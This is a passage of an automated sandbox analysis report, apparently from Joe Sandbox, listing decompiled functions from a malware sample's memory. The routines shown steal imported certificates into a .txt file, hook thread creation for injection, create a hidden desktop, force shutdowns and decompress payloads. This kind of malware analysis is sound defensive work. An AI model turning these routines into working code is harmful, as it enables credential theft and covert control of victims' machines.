Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 5ddd9318bc1beb9cae27247ebc4d7abe6bdf830309cb65f3256c1863fd2f98ee
Instruction ID: a4cdc2af4e8429626b765b3d249f997a9a300350ebb3a861ebdab98f345a25fc
Opcode Fuzzy Hash: 5ddd9318bc1beb9cae27247ebc4d7abe6bdf830309cb65f3256c1863fd2f98ee
Instruction Fuzzy Hash: 9AF0896671111256E7301A3EEDCDB7B2ADDDB857B17148719F662C11D0D76488825630

Uniqueness

Uniqueness Score: -1.00%

Function 012B1B1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E012B1B1D(intOrPtr __eax, void* __esi) {
				void* _t52;
				short* _t53;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t68;
				intOrPtr* _t69;
				void* _t74;
				void* _t76;

				_t74 = _t76 - 0x6c;
				_t53 =  *((intOrPtr*)(_t74 + 0x78));
				_t69 =  *((intOrPtr*)(_t74 + 0x74));
				__imp__PFXImportCertStore(_t69, _t53,  *(_t74 + 0x7c), _t68, _t52);
				 *((intOrPtr*)(_t74 + 0x78)) = __eax;
				if(__eax != 0 && ( *(_t74 + 0x7c) & 0x10000000) == 0 && _t69 != 0 &&  *_t69 > 0 &&  *((intOrPtr*)(_t69 + 4)) != 0 && L012B150A() != 0) {
					GetSystemTime(_t74 + 0x50);
					_t55 = 0x38;
					L012B1479(_t55, _t74 - 0x7c);
					_t56 = 0x39;
					L012B1479(_t56, _t74 + 0x40);
					E012B37D3(_t74 - 0x284);
					_push( *(_t74 + 0x50) & 0x0000ffff);
					_push( *(_t74 + 0x52) & 0x0000ffff);
					_push( *(_t74 + 0x56) & 0x0000ffff);
					_push(_t74 + 0x40);
					if(L012B1A8C(_t74 - 0x3c, 0x3e, _t74 - 0x7c, _t74 - 0x284) > 0) {
						_push( *_t69);
						_push( *((intOrPtr*)(_t69 + 4)));
						_push(_t74 - 0x3c);
						_t57 = 2;
						if(L012B1B86(_t57, 0) != 0 && _t53 != 0 &&  *_t53 != 0) {
							L012B101E(_t74 - 0x3c, 4);
							if(L012B169A(_t53, L".txt" | 0xffffffff, _t74 + 0x60) != 0) {
								_push( *((intOrPtr*)(_t74 + 0x68)));
								_push( *((intOrPtr*)(_t74 + 0x60)));
								_push(_t74 - 0x3c);
								_t60 = 2;
								L012B1B86(_t60, 0);
								L012B138E(_t74 + 0x60);
							}
						}
					}
				}
				return  *((intOrPtr*)(_t74 + 0x78));
			}

0x012b39c5
0x012b39d0
0x012b39d7
0x012b39dc
0x012b39e2
0x012b39e7
0x012b3a27
0x012b3a32
0x012b3a33
0x012b3a3d
0x012b3a3e
0x012b3a49
0x012b3a52
0x012b3a57
0x012b3a5c
0x012b3a60
0x012b3a79
0x012b3a7b
0x012b3a80
0x012b3a85
0x012b3a88
0x012b3a90
0x012b3aa6
0x012b3abb
0x012b3abd
0x012b3ac3
0x012b3ac8
0x012b3acb
0x012b3acc
0x012b3ad4
0x012b3ad4
0x012b3abb
0x012b3a90
0x012b3a79
0x012b3ae2

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 012B39DC
GetSystemTime.KERNEL32(?), ref: 012B3A27

Part of subcall function 012B37D3: GetUserNameExW.SECUR32(00000002,?,?), ref: 012B37E5

Strings

.txt, xrefs: 012B3A9E

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CertImportNameStoreSystemTimeUser
String ID: .txt
API String ID: 3421741743-2195685702
Opcode ID: d4fa85295894becc2472fbf3d31563d4260b875f717f16fd9fc37f957eb4341c
Instruction ID: 217c0f0546cdf6fc204210e75a6089925a783b6e64d4281316ae9e05164cb0f3
Opcode Fuzzy Hash: d4fa85295894becc2472fbf3d31563d4260b875f717f16fd9fc37f957eb4341c
Instruction Fuzzy Hash: BA31A371A1020AAAEB24EFE8DCC4BFE77A9FF58390F144419BA2196094EB75D454CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012C80B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E012C80B0(void* __edx, void* __esi) {
				signed int _v120;
				signed char _t12;

				_t12 =  *0x12dd318;
				if((_t12 & 0x00000010) == 0) {
					if((_t12 & 0x00000008) != 0) {
						L012B1488(__esi);
						_t12 =  *0x12dd318;
					}
					if((_t12 & 0x00000003) == 0) {
						if((_t12 & 0x00000004) != 0) {
							return ExitWindowsEx(0x14, 0x80000000);
						}
						return _t12;
					} else {
						L012B19C9(L"SeShutdownPrivilege", 1);
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x12dd318 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					if(L012B117C(_t12,  &_v120, __edx, __esi) == 0) {
						return 0;
					} else {
						_v120 = _v120 | 0x00000020;
						 *0x12dc738 =  *0x12dc738 | 0x00000010;
						L012B10E1( &_v120);
						E012C1A81();
						return 1;
					}
				}
			}

0x012c80b0
0x012c80b7
0x012c80c0
0x012c80c4
0x012c80c9
0x012c80c9
0x012c80d0
0x012c80fe
0x00000000
0x012c8107
0x012c810d
0x012c80d2
0x012c80d9
0x012c80f5
0x012c80fb
0x012c80fb
0x012c80b9
0x012c1a9f
0x012c1ac0
0x012c1aa1
0x012c1aa1
0x012c1aa5
0x012c1aaf
0x012c1ab4
0x012c1abc
0x012c1abc
0x012c1a9f

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 012C80F5

Strings

SeShutdownPrivilege, xrefs: 012C80D4

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: InitiateShutdownSystem
String ID: SeShutdownPrivilege
API String ID: 267423221-3733053543
Opcode ID: 5256b4c054cc3382e78081e4324f2b6babbdd7024e37a27ce4e2932da989a03e
Instruction ID: 40bdfc4bea2edf6150420d3ae0e96895d0e96e680542b5f3fed1c5c773ee15fa
Opcode Fuzzy Hash: 5256b4c054cc3382e78081e4324f2b6babbdd7024e37a27ce4e2932da989a03e
Instruction Fuzzy Hash: 1AF0E530531683AAFE24877CBC5DFF51B54D701B84F184408EB80A6194C9555402D765

Uniqueness

Uniqueness Score: -1.00%

Function 012C2BCD Relevance: 4.6, APIs: 3, Instructions: 59
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E012C2BCD(void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				long _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v32;
				void* __edi;
				void* _t20;
				void* _t26;
				signed int _t29;
				void* _t30;
				CONTEXT* _t31;
				void* _t35;
				void* _t37;
				void* _t38;

				_t35 = __edx;
				_t20 = L012B150A();
				_t31 = _a24;
				if(_t20 != 0 && NtQueryInformationProcess(_a16, 0,  &_v32, 0x18,  &_v8) >= 0 && _v28 != 0) {
					_t32 = _v16;
					if(_v16 == 0) {
						L5:
						_push(_t37);
						_t38 = L012B1C44(_v16, _t35, _t37, _t44);
						_t45 = _t38;
						if(_t38 != 0) {
							_t26 = L012B1A05(_a16, _t38, _t45, 0);
							if(_t26 != 0) {
								_t29 = _t26 -  *0x12dc74c + E012B1474;
								if(( *0x12dc738 & 0x00000010) != 0) {
									_t29 = _t29 ^  *(_t31 + 0xb0);
								}
								 *(_t31 + 0xb0) = _t29;
							}
							CloseHandle(_t38);
						}
					} else {
						_t30 = L012B18A2(_t32);
						_t44 = _t30;
						if(_t30 == 0) {
							goto L5;
						}
					}
				}
				return NtCreateThread(_a4, _a8, _a12, _a16, _a20, _t31, _a28, _a32);
			}

0x012c2bcd
0x012c2bd4
0x012c2bd9
0x012c2bde
0x012c2bff
0x012c2c04
0x012c2c0f
0x012c2c12
0x012c2c18
0x012c2c1a
0x012c2c1c
0x012c2c25
0x012c2c2c
0x012c2c34
0x012c2c40
0x012c2c42
0x012c2c42
0x012c2c48
0x012c2c48
0x012c2c4f
0x012c2c4f
0x012c2c06
0x012c2c06
0x012c2c0b
0x012c2c0d
0x00000000
0x00000000
0x012c2c0d
0x012c2c04
0x012c2c74

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 012C2BEF
CloseHandle.KERNEL32(00000000,00000000), ref: 012C2C4F
NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 012C2C6C

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseCreateHandleInformationProcessQueryThread
String ID:
API String ID: 2341911113-0
Opcode ID: 0c3448bb896ffc1a65d485d5ae3ebfe80ce47053e17bf3ba72afbb0030bd6fad
Instruction ID: 0eee076d4baf5b59d15f1278cba4e9e09d2bdec25fda2b985e271dfedf93b660
Opcode Fuzzy Hash: 0c3448bb896ffc1a65d485d5ae3ebfe80ce47053e17bf3ba72afbb0030bd6fad
Instruction Fuzzy Hash: 84118E3151020AEBEF159FA8E994BFE3B6AFF44740F150128EB0155195DB30D921DB11

Uniqueness

Uniqueness Score: -1.00%

Function 012B1929 Relevance: 4.5, APIs: 3, Instructions: 31networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000011), ref: 012B6E40
bind.WS2_32(00000000,?,-0000001D), ref: 012B6E60
closesocket.WS2_32(00000000), ref: 012B6E6B

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: e3025f32c59eddf35bfb4faa565127f7b4578d3bafbd9104e9f668f08fc57c6f
Instruction ID: 34d7ea470ee7fb107e42ce9e9d3b4db73823b0499382afc2ea4627435bb8801b
Opcode Fuzzy Hash: e3025f32c59eddf35bfb4faa565127f7b4578d3bafbd9104e9f668f08fc57c6f
Instruction Fuzzy Hash: 50E09B3761101156E3301B3DFC4EEBB39A99F967B17194715BA72D20D1D7788C829230

Uniqueness

Uniqueness Score: -1.00%

Function 012B685D Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,?), ref: 012B68B7
recv.WS2_32(?,?,?,00000000), ref: 012B68D0

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: adb3b724d8fbda31da020b474692a3148a545d5b35fb08e91f424fb3c919866a
Instruction ID: f7a38d8d650be4f6bf2f23326fd142931e8332a7eed8ab228bee7fbdda7d815a
Opcode Fuzzy Hash: adb3b724d8fbda31da020b474692a3148a545d5b35fb08e91f424fb3c919866a
Instruction Fuzzy Hash: 500171B1E10218ABDB1D8B58DC45BEDBBB9AB45720F14827AB626E61C0D6B05A458B80

Uniqueness

Uniqueness Score: -1.00%

Function 012C7B5C Relevance: 3.0, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E012C7B5C(char* __ecx) {
				void* _v40;
				intOrPtr _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				int _t15;
				signed int _t18;
				short _t22;
				void* _t25;
				char* _t26;

				_t25 = 6;
				_t26 = __ecx;
				L012B19F6(__ecx, _t25);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t15 = GetVersionExW( &_v324);
				if(_t15 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *_t26 = L012B1532();
					_t18 = 0;
					if(_v48 <= 0xff && _v46 == 0) {
						_t18 = _v48 & 0x000000ff;
					}
					 *(_t26 + 1) = _t18;
					asm("sbb eax, eax");
					 *((short*)(_t26 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t22 = _v40;
					 *((short*)(_t26 + 4)) = _t22;
					return _t22;
				}
				return _t15;
			}

0x012c7b68
0x012c7b69
0x012c7b6b
0x012c7b77
0x012c7b81
0x012c7b89
0x012c7b8f
0x012c7b9a
0x012c7ba1
0x012c7ba7
0x012c7baf
0x012c7baf
0x012c7bb3
0x012c7bc1
0x012c7bcb
0x012c7bcf
0x012c7bd3
0x00000000
0x012c7bd3
0x012c7bd9

APIs

GetVersionExW.KERNEL32(?), ref: 012C7B81
GetNativeSystemInfo.KERNEL32(?), ref: 012C7B8F

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: a3e3bca186dd3158eaa5926bada76636fc874d82757420007579d976c788bc16
Instruction ID: fe1d643614ee0e56e163138dfe57ce87b6fe0700434efce1823f8ce74c9ae6fa
Opcode Fuzzy Hash: a3e3bca186dd3158eaa5926bada76636fc874d82757420007579d976c788bc16
Instruction Fuzzy Hash: 6301D63591125A4ADB30EBB9D9056EDB7F4EF08700F0085AAD645E3280FA34EA44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 012D022B Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012D022B(WCHAR* __ecx, long __edx) {
				char _v20;
				struct HDESK__* _t2;
				long _t5;
				void* _t7;
				WCHAR* _t10;

				_t10 = __ecx;
				_t5 = __edx;
				if(__ecx == 0) {
					_t10 =  &_v20;
					_t7 = 0x5b;
					L012B1479(_t7, _t10);
				}
				_t2 = OpenDesktopW(_t10, 0, 0, _t5);
				if(_t2 == 0) {
					return CreateDesktopW(_t10, 0, 0, 0, _t5, 0);
				}
				return _t2;
			}

0x012d0234
0x012d0238
0x012d023c
0x012d0240
0x012d0245
0x012d0246
0x012d0246
0x012d024f
0x012d0257
0x00000000
0x012d025f
0x012d0269

APIs

OpenDesktopW.USER32(?,00000000,00000000), ref: 012D024F
CreateDesktopW.USER32 ref: 012D025F

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Desktop$CreateOpen
String ID:
API String ID: 153846745-0
Opcode ID: 776cd8deae859f7ccee09dffd97c6e9c58c00d54db70d177ad8c18c00abab919
Instruction ID: e89259be5223c533ae69ed7944054105152c97f2aaac7492f27cb4c8fd072b9e
Opcode Fuzzy Hash: 776cd8deae859f7ccee09dffd97c6e9c58c00d54db70d177ad8c18c00abab919
Instruction Fuzzy Hash: 2CE04F767021353B9232226AAC8CDFF7E2EDEC6AF5B514815F249A21858AA09C0281F5

Uniqueness

Uniqueness Score: -1.00%

Function 012B3E69 Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B3E69() {
				struct _TIME_ZONE_INFORMATION _v176;
				long _t6;
				intOrPtr _t8;

				_t6 = GetTimeZoneInformation( &_v176);
				if(_t6 != 1) {
					if(_t6 != 2) {
						return 0;
					} else {
						_t8 = _v176.DaylightBias;
						goto L4;
					}
				} else {
					_t8 = _v176.StandardBias;
					L4:
					return (_t8 + _v176.Bias) * 0xffffffc4;
				}
			}

0x012b3e79
0x012b3e82
0x012b3e8c
0x012b3e9f
0x012b3e8e
0x012b3e8e
0x00000000
0x012b3e8e
0x012b3e84
0x012b3e84
0x012b3e91
0x012b3e9b
0x012b3e9b

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 012B3E79

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 8674632f22404c83b92f1d2b989fe1d0de282fbf07afb5ac9804af2c1f8c7299
Instruction ID: 135cc0307083d53c53e47a8d25a83cc3ba6338fd20d75c9180849e293855d4b6
Opcode Fuzzy Hash: 8674632f22404c83b92f1d2b989fe1d0de282fbf07afb5ac9804af2c1f8c7299
Instruction Fuzzy Hash: 31E01231F10208DBDF20D6A8E9CAB9DB7F8BB01348F110592E141E6141D674ED458B92

Uniqueness

Uniqueness Score: -1.00%

Function 012C1A81 Relevance: 1.5, APIs: 1, Instructions: 4
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C1A81() {

				return ExitWindowsEx(0x14, 0x80000000);
			}

0x012c1a8e

APIs

ExitWindowsEx.USER32(00000014,80000000), ref: 012C1A88

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: ExitWindows
String ID:
API String ID: 1089080001-0
Opcode ID: 2e7f0d786aa9a5257a9080de2d5b0ecfcb4e9c239a970bdd84a110a38dc5bafc
Instruction ID: 7aa4e2dbf559a6b80ebd5ecb5a4121e1bc8c86e08d35a76aa3af8aaf6cd7f965
Opcode Fuzzy Hash: 2e7f0d786aa9a5257a9080de2d5b0ecfcb4e9c239a970bdd84a110a38dc5bafc
Instruction Fuzzy Hash: 6AA002309411059AEE205760AE0DF4426509750702F6440546B0AA9198D5601055D629

Uniqueness

Uniqueness Score: -1.00%

Function 012B636F Relevance: .3, Instructions: 258
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E012B636F(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _t83;
				signed int _t85;
				unsigned int _t87;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed char _t92;
				signed char _t93;
				signed char _t95;
				signed char _t96;
				intOrPtr* _t103;
				intOrPtr _t104;
				signed char _t105;
				signed char _t106;
				unsigned int _t111;
				signed int _t112;
				unsigned int _t113;
				signed int _t114;
				unsigned int _t115;
				signed int _t116;
				unsigned int _t118;
				signed int _t120;
				unsigned int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t138;
				signed int _t139;
				signed int _t145;
				signed int _t150;
				signed int _t160;
				signed int _t162;
				signed int _t168;
				signed int _t170;
				void* _t171;
				void* _t176;

				_v24 = __edx;
				_t88 = __ecx;
				_t90 = 0;
				_t176 = 0;
				_t160 = 0;
				_v32 = 1;
				_v28 =  *_a8;
				while(1) {
					_v20 = _t160;
					if(_t90 == 0) {
						_t111 =  *(_t176 + _t88);
						_t176 = _t176 + 4;
						_t91 = 0x1f;
						_t112 = _t111 >> 0x1f;
					} else {
						_t91 = _t90 - 1;
						_t112 = _t87 >> _t91 & 0x00000001;
					}
					_v16 = _t91;
					if(_t112 == 0) {
						goto L9;
					}
					if(_t176 >= _v24 || _t160 >= _v28) {
						L61:
						_t83 = 0;
						L62:
						return _t83;
					} else {
						 *((char*)(_t160 + _a4)) =  *(_t176 + _t88);
						_t160 = _t160 + 1;
						_t176 = _t176 + 1;
						L8:
						_t90 = _v16;
						continue;
					}
					L9:
					_v12 = 1;
					L10:
					L10:
					if(_t91 == 0) {
						_t113 =  *(_t176 + _t88);
						_t176 = _t176 + 4;
						_t92 = 0x1f;
						_t114 = _t113 >> 0x1f;
					} else {
						_t92 = _t91 - 1;
						_t114 = _t87 >> _t92 & 0x00000001;
					}
					_t162 = _t114 + _v12 * 2;
					_v12 = _t162;
					if(_t176 >= _v24 || _t162 > 0x1000002) {
						goto L61;
					}
					if(_t92 == 0) {
						_t115 =  *(_t176 + _t88);
						_t176 = _t176 + 4;
						_t93 = 0x1f;
						_t116 = _t115 >> 0x1f;
					} else {
						_t93 = _t92 - 1;
						_t116 = _t87 >> _t93 & 0x00000001;
					}
					if(_t116 != 0) {
						if(_t162 != 2) {
							if(_t176 >= _v24) {
								goto L61;
							}
							_t118 = ( *(_t176 + _t88) & 0x000000ff) + (_t162 + 0xfffffffd << 8);
							_t176 = _t176 + 1;
							if(_t118 == 0xffffffff) {
								_t85 = _v20;
								 *_a8 = _t85;
								_t83 = _t85 & 0xffffff00 | _t176 == _v24;
								goto L62;
							}
							_t168 =  !_t118 & 0x00000001;
							_t120 = (_t118 >> 1) + 1;
							_v12 = _t120;
							_v32 = _t120;
							L30:
							if(_t168 == 0) {
								if(_t93 == 0) {
									_t121 =  *(_t176 + _t88);
									_t176 = _t176 + 4;
									_t95 = 0x1f;
									_t122 = _t121 >> 0x1f;
								} else {
									_t95 = _t93 - 1;
									_t122 = _t87 >> _t95 & 0x00000001;
								}
								if(_t122 == 0) {
									_v8 = 1;
									L45:
									L45:
									if(_t95 == 0) {
										_t87 =  *(_t176 + _t88);
										_t176 = _t176 + 4;
										_t96 = 0x1f;
										_t124 = _t87 >> 0x1f;
									} else {
										_t96 = _t95 - 1;
										_t124 = _t87 >> _t96 & 0x00000001;
									}
									_t125 = _t124 + _v8 * 2;
									_v8 = _t125;
									if(_t176 >= _v24 || _t125 >= _v28) {
										goto L61;
									}
									if(_t96 == 0) {
										_t87 =  *(_t176 + _t88);
										_t176 = _t176 + 4;
										_t95 = 0x1f;
										_t127 = _t87 >> 0x1f;
									} else {
										_t95 = _t96 - 1;
										_t127 = _t87 >> _t95 & 0x00000001;
									}
